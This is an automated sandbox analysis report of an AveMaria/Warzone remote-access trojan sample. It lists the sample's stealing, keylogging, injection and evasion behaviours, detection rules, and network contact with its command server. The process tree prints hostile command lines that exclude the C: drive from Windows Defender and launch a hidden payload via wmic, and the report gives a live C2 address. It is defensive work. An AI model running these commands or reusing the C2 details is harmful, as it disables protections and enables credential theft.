Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507

Overview

General Information

Sample Name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
Analysis ID:631792
MD5:dabc6f0c75c134e5310ba3526adba833
SHA1:854ec103a64182c97e8f25e45da04889dbbbf3ff
SHA256:9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
Tags:exe
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Creates processes via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Drops script or batch files to the startup folder
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Contains functionality to create processes via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Hides user accounts
Contains functionality to steal e-mail passwords
Found evasive API chain checking for user administrative privileges
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates files in alternative data streams (ADS)
Found decision node followed by non-executed suspicious APIs
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to download and execute PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Spawns drivers
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe (PID: 6324 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe" MD5: DABC6F0C75C134E5310BA3526ADBA833)
    • powershell.exe (PID: 6368 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • images.exe (PID: 6516 cmdline: C:\ProgramData\images.exe MD5: DABC6F0C75C134E5310BA3526ADBA833)
      • powershell.exe (PID: 6732 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6840 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 7004 cmdline: wmic process call create '"C:\ProgramData:ApplicationData"' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • WmiPrvSE.exe (PID: 6700 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • WmiPrvSE.exe (PID: 6984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "23.227.202.157", "port": 8080}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x178c8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x178c8:$c1: Elevation:Administrator!new:
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
        00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xdf0:$c1: Elevation:Administrator!new:
        Click to see the 42 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
        • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0xd80:$c1: Elevation:Administrator!new:
        0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x191f0:$c1: Elevation:Administrator!new:
          Click to see the 81 entries

          Sigma Signatures

          Data Obfuscation

          barindex
          Sigma detected: Drops script at startup location
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, ProcessId: 6324, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

          Snort Signatures

          Timestamp:192.168.2.323.227.202.1574974080802834979 05/22/22-12:33:29.604971
          SID:2834979
          Source Port:49740
          Destination Port:8080
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:23.227.202.157192.168.2.38080497402841903 05/22/22-12:33:29.434739
          SID:2841903
          Source Port:8080
          Destination Port:49740
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllAvira: detection malicious, Label: PUA/Remoteadmin.AR
          Found malware configuration
          Source: 4.2.images.exe.22e053f.3.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "23.227.202.157", "port": 8080}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeReversingLabs: Detection: 24%
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllVirustotal: Detection: 49%Perma Link
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllMetadefender: Detection: 20%Perma Link
          Source: C:\Program Files\Microsoft DN1\sqlmap.dllReversingLabs: Detection: 50%
          Source: C:\ProgramData:ApplicationDataReversingLabs: Detection: 24%
          Source: C:\ProgramData\images.exeReversingLabs: Detection: 24%
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\ProgramData:ApplicationDataJoe Sandbox ML: detected
          Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpackAvira: Label: TR/Redcap.ghjpt
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.3.images.exe.732cb8.3.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.3.images.exe.732cb8.7.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.2.images.exe.22e053f.3.unpackAvira: Label: TR/Patched.Ren.Gen3
          Source: 4.2.images.exe.2ce0000.4.unpackAvira: Label: TR/Redcap.ghjpt
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CAFC CryptUnprotectData,LocalAlloc,LocalFree,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CF58 LocalAlloc,BCryptDecrypt,LocalFree,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,

          Exploits

          barindex
          Yara detected UACMe UAC Bypass tool
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdb source: images.exe, images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdbUGP source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FD34 FindFirstFileExA,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FE55 FindFirstFileExA,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2841903 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 23.227.202.157:8080 -> 192.168.2.3:49740
          Source: TrafficSnort IDS: 2834979 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.3:49740 -> 23.227.202.157:8080
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: 23.227.202.157
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW,
          Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
          Source: global trafficTCP traffic: 192.168.2.3:49740 -> 23.227.202.157:8080
          Source: powershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
          Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: sqlmap.dll.4.drString found in binary or memory: http://stascorp.comDVarFileInfo$
          Source: powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
          Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1F23D recv,recv,
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157
          Source: unknownTCP traffic detected without corresponding DNS query: 23.227.202.157

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Installs a global keyboard hook
          Source: C:\ProgramData\images.exeWindows user hook set: 0 keyboard low level C:\ProgramData\images.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D189D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
